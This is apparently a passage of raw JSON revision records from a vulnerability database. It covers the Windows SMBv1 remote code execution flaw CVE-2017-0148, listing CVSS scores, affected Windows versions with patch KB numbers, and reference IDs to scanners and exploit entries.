"kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T18:49:52", "differentElements": ["msAffectedSoftware"], "edition": 65}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-19T20:59:37", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KB3210721", "KBMS16-110, 3187754", "KB3210720", "KB4012217", "KB3212646", "KB4012216", "KB4013198", "KB3205401", "KB4012214", "KB4012212", "KB4012215", "KB4012598", "KB4013429", "KB4012606", "KB4012213", "KB3205409", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T20:59:37", "differentElements": ["msAffectedSoftware"], "edition": 66}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-20T02:45:21", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210720", "KB3210721", "KB3205409", "KB4012214", "KB4012215", "KB3177186", "KB4012598", "KB4013198", "KB4012216", "KB4012212", "KB4013429", "KB4012606", "KB3205401", "KB4012213", "KBMS16-110, 3187754", "KB3212646", "KB4012217", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T02:45:21", "differentElements": ["msAffectedSoftware"], "edition": 67}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "80a0fac71f040ba4d47cf15ded29e9dd", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-20T04:47:39", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4012215", "KB4012217", "KB4012213", "KB4013429", "KB3210721", "KB4012212", "KB4012606", "KB3213986", "KB3205409", "KB3210720", "KB4012216", "KB4012214", "KB4012598", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": 